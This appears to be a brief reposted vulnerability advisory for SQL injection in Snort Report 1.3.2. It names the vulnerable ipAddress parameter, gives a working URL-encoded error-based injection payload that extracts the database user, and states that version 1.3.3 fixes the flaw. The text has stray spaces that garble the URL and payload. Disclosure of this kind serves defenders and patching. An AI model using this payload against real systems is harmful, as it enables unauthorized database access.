Author: a. kadir altan (testpenter_AT_gmail.com)
: Http://www.symmetrixtech.com/ids/snortreport-1.3.2.tar.gz
Affected Versions: <= 1.3.2
Platform: PHP
Defect URL:
Http://www.bkjia.com/ipdetail. php? Type = dst & FQDN = & ipAddress = 773116111 <SQLi Here> & beginTime = 0 & endTime = 1324665310
Test:
Http://www.bkjia.com/ipdetail.php? Type = dst & FQDN = & ipAddress = 773116111% 20AND % 20% 28 SELECT % 205849% 20 FROM % 28 SELECT % 20 COUNT % 28 * % 29% 2 CCONCAT % 280x3a79786a3a % 2C % 28MID % 28% 28 IFNULL % 28 CAST % 28CURRENT_USER % 28% 29% 20AS % 20 CHAR % 29% 2C0x20% 29% 29% 2C1% 2C50% 29% 29% 2C0x3a7578713a % 2 CFLOOR % 28 RAND % 280% 29*2% 29% 29x % 20 FROM % 20INFORMATION_SCHEMA.CHARACTER_SETS % 20 GROUP % 20BY % 20x % 29a % 29 & beginTime = 0 & endTime = 1324665310
##########################
Www.2cto.com Solution
V1.3.3 patch upgrade has been fixed